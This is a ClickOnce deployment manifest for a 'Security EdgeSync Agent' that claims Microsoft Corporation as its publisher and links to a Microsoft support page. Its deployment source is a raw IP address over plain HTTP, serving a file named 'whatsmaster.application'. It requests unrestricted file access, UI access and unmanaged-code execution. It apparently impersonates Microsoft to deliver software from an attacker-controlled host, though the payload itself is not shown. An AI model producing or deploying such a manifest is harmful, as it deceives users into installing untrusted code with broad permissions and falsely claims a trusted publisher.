<?xml version="1.0" encoding="utf-8"?>
<deployment xmlns="urn:schemas-microsoft-com:clickonce:deployment" manifestVersion="1.0">
  <deploymentProvider codebase="http://69.62.126.191/deploy/whatsmaster.application" />

  <application identity="EdgeSync.Agent" name="Security EdgeSync Agent">
    <publisher>Microsoft Corporation</publisher>

    <description>
      <defaultTitle>Security EdgeSync Agent</defaultTitle>
      <defaultDescription>This agent ensures secure synchronization between Microsoft services and business accounts.</defaultDescription>
    </description>

    <supportUrl>https://support.microsoft.com/help/edge-sync-agent</supportUrl>
  </application>

  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <applicationRequestMinimum>
        <PermissionSet class="System.Security.PermissionSet" version="1">
          <IPermission class="System.Security.Permissions.UIPermission, mscorlib" version="1" Unrestricted="true"/>
          <IPermission class="System.Security.Permissions.FileIOPermission, mscorlib" version="1" Unrestricted="true"/>
          <IPermission class="System.Security.Permissions.SecurityPermission, mscorlib" version="1" Flags="Execution, UnmanagedCode"/>
        </PermissionSet>
        <defaultAssemblyRequest permissionSetReference="Custom" />
      </applicationRequestMinimum>
      <requestedExecutionLevel level="asInvoker" uiAccess="false" />
    </security>
  </trustInfo>
</deployment>
